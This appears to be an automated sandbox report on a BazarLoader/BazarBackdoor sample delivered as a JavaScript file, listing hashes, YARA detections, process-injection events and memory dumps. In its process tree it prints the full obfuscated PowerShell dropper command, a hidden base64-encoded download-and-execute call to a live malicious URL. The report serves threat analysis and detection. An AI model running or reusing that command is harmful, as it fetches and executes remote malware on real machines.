bazarbackdoor | f003e8b9aaf7890828c537402950f4e6f72196fe69624cb3ec76a05ae917db42

Analysis

max time kernel
132s
max time network
132s
platform
windows7_x64
resource
win7-en-20210920
submitted
07-10-2021 17:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Stolen Images Evidence.js
Size

18KB
MD5

90efa8d6677a45ea3397ab8c2bb5bfcd
SHA1

451c972435ed6e4a3abe1d390ff52691d84d20fa
SHA256

7e014f3533333cbbae1dcd3505a25990d07e7f4a3684fb8b35f744d02215b20a
SHA512

809b4dcb00b016b537279fadec1ace549b6848dcb37a20d0548b7036a2e103e5b4eb7b0f45749fd50a3bae17310ca797362181150fed5be2169f2cb6ac6f9c9a

Score

10^/10

bazarbackdoor bazarloader backdoor dropper loader

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://mopuketo.space/222g100/index.php

Signatures

Bazar Loader
Detected loader normally used to deploy BazarBackdoor malware.
loader dropper bazarloader
BazarBackdoor
Stealthy backdoor targeting corporate networks, believed to be developed by Trickbot's authors.
backdoor bazarbackdoor

Bazar/Team9 Backdoor payload 60 IoCs

Processes:

resource	yara_rule
behavioral1/memory/976-69-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-70-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-72-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-71-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-74-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-75-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-76-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-78-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-80-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-79-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-83-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-84-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-86-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-89-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-88-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-90-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-92-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-94-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-96-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-95-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-97-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-99-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-100-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-102-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-104-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-105-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-106-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-110-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-111-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-112-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-113-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-114-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-115-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-117-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-119-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-120-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-121-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-122-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-124-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-126-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-125-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-123-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-118-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-116-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-109-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-108-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-107-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-103-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-101-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-98-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-93-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-91-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-87-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-85-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-82-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-81-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-77-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-73-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4
behavioral1/memory/976-862-0x00000000FF404110-mapping.dmp	BazarBackdoorVar4
behavioral1/memory/976-863-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp	BazarBackdoorVar4

Bazar/Team9 Loader payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/808-66-0x00000000001B0000-0x00000000001D8000-memory.dmp	BazarLoaderVar6

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

5 544 powershell.exe
Loads dropped DLL 1 IoCs

Processes:

regsvr32.exe

pid process

808 regsvr32.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

regsvr32.exe

description pid process target process

PID 808 set thread context of 976 808 regsvr32.exe svchost.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exeregsvr32.exe

pid process

544 powershell.exe
808 regsvr32.exe
808 regsvr32.exe
808 regsvr32.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 544 powershell.exe

flow	pid	process
5	544	powershell.exe

pid	process
808	regsvr32.exe

description	pid	process	target process
PID 808 set thread context of 976	808	regsvr32.exe	svchost.exe

pid	process
544	powershell.exe
808	regsvr32.exe
808	regsvr32.exe
808	regsvr32.exe

description	pid	process
Token: SeDebugPrivilege	544	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

wscript.execmd.exepowershell.exeregsvr32.exe

description	pid	process	target process
PID 1540 wrote to memory of 1812	1540	wscript.exe	cmd.exe
PID 1540 wrote to memory of 1812	1540	wscript.exe	cmd.exe
PID 1540 wrote to memory of 1812	1540	wscript.exe	cmd.exe
PID 1812 wrote to memory of 544	1812	cmd.exe	powershell.exe
PID 1812 wrote to memory of 544	1812	cmd.exe	powershell.exe
PID 1812 wrote to memory of 544	1812	cmd.exe	powershell.exe
PID 544 wrote to memory of 808	544	powershell.exe	regsvr32.exe
PID 544 wrote to memory of 808	544	powershell.exe	regsvr32.exe
PID 544 wrote to memory of 808	544	powershell.exe	regsvr32.exe
PID 544 wrote to memory of 808	544	powershell.exe	regsvr32.exe
PID 544 wrote to memory of 808	544	powershell.exe	regsvr32.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe
PID 808 wrote to memory of 976	808	regsvr32.exe	svchost.exe

C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\Stolen Images Evidence.js"
1⤵
- Suspicious use of WriteProcessMemory
PID:1540
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBvAHAAdQBrAGUAdABvAC4AcwBwAGEAYwBlAC8AMgAyADIAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA=
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1812
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBvAHAAdQBrAGUAdABvAC4AcwBwAGEAYwBlAC8AMgAyADIAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA=
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:544
  - - C:\Windows\System32\regsvr32.exe
      "C:\Windows\System32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\PWTbnL.dat
      4⤵
      Loads dropped DLL
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:808
    - - C:\Windows\system32\svchost.exe
        
        C:\Windows\system32\svchost.exe -k UnistackSvcGroup
        5⤵
        
        PID:976

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\regsvr32.exe,DllRegisterServer {296D9610-E708-40FF-A80D-0619E2F1A5BA}
1⤵
PID:1936

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\PWTbnL.dat

MD5
8e071a00bc9b5414ad3f4dcbf97cc8a9

SHA1
414264742503b5b9012dd73db5c561e3642fb62a

SHA256
968a9450cff6accf45665aa46adc0142140259017675df9ec4cda6c336addc04

SHA512
d2bddd879a1c88af00c8df2a6ae5378f80bb78545a5e58042b5ca395545a5594600ce900736303e26b9c6fd01f79ae94a9c88576164cbab9bea5a393382245b2

Download Submit
\Users\Admin\AppData\Local\Temp\PWTbnL.dat

MD5
8e071a00bc9b5414ad3f4dcbf97cc8a9

SHA1
414264742503b5b9012dd73db5c561e3642fb62a

SHA256
968a9450cff6accf45665aa46adc0142140259017675df9ec4cda6c336addc04

SHA512
d2bddd879a1c88af00c8df2a6ae5378f80bb78545a5e58042b5ca395545a5594600ce900736303e26b9c6fd01f79ae94a9c88576164cbab9bea5a393382245b2

Download Submit
memory/544-55-0x0000000000000000-mapping.dmp

Download
memory/544-58-0x00000000027B0000-0x00000000027B2000-memory.dmp

Filesize
8KB

Download
memory/544-59-0x00000000027B2000-0x00000000027B4000-memory.dmp

Filesize
8KB

Download
memory/544-60-0x00000000027B4000-0x00000000027B7000-memory.dmp

Filesize
12KB

Download
memory/544-57-0x000007FEF2A90000-0x000007FEF35ED000-memory.dmp

Filesize
11.4MB

Download
memory/544-61-0x00000000027BB000-0x00000000027DA000-memory.dmp

Filesize
124KB

Download
memory/808-62-0x0000000000000000-mapping.dmp

Download
memory/808-66-0x00000000001B0000-0x00000000001D8000-memory.dmp

Filesize
160KB

Download
memory/976-69-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-70-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-72-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-71-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-74-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-75-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-76-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-78-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-80-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-79-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-83-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-84-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-86-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-89-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-88-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-90-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-92-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-94-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-96-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-95-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-97-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-99-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-100-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-102-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-104-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-105-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-106-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-110-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-111-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-112-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-113-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-114-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-115-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-117-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-119-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-120-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-121-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-122-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-124-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-126-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-125-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-123-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-118-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-116-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-109-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-108-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-107-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-103-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-101-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-98-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-93-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-91-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-87-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-85-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-82-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-81-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-77-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-73-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-68-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-67-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/976-862-0x00000000FF404110-mapping.dmp

Download
memory/976-863-0x00000000FF3E0000-0x00000000FF42A000-memory.dmp

Filesize
296KB

Download
memory/1540-53-0x000007FEFC391000-0x000007FEFC393000-memory.dmp

Filesize
8KB

Download
memory/1812-54-0x0000000000000000-mapping.dmp

Download